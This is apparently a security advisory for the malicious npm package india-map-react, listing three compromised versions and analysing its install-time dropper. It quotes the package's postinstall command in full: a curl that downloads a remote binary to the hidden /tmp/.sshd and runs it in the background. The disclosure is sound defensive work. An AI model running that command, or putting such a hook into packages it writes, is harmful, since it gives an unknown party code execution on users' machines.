npm · Malicious package advisory
Malwareindia-map-react
MAL-2026-5542
Malicious code in india-map-react (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a1de9d093e23698e3ad3f0336a7619bd43049d1f62b822744733a48060b51a4a)
package.json declares a postinstall hook that runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. On every `npm install`, this fetches a binary from a GitHub account ('parikhpreyash4') unrelated to the npm publisher ('yuvrajDurgesh'), with TLS verification disabled (`-k`), follows redirects (`-L`), suppresses all errors (`2>/dev/null`), stages the binary under a deceptive hidden path masquerading as the SSH daemon (`/tmp/.sshd`), marks it executable, and runs it in the background. The URL uses the mutable `latest/download` alias rather than a pinned release with a verified hash, so the author can swap the executed bytes at any time. The package advertises itself as a React component for rendering an India map — there is no legitimate reason for it to fetch and execute a native binary named after a system network daemon. This is a textbook install-time dropper granting arbitrary code execution on every installer's machine.
Compromised versions (3)
- 2.0.2
- 2.0.3
- 2.0.1
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.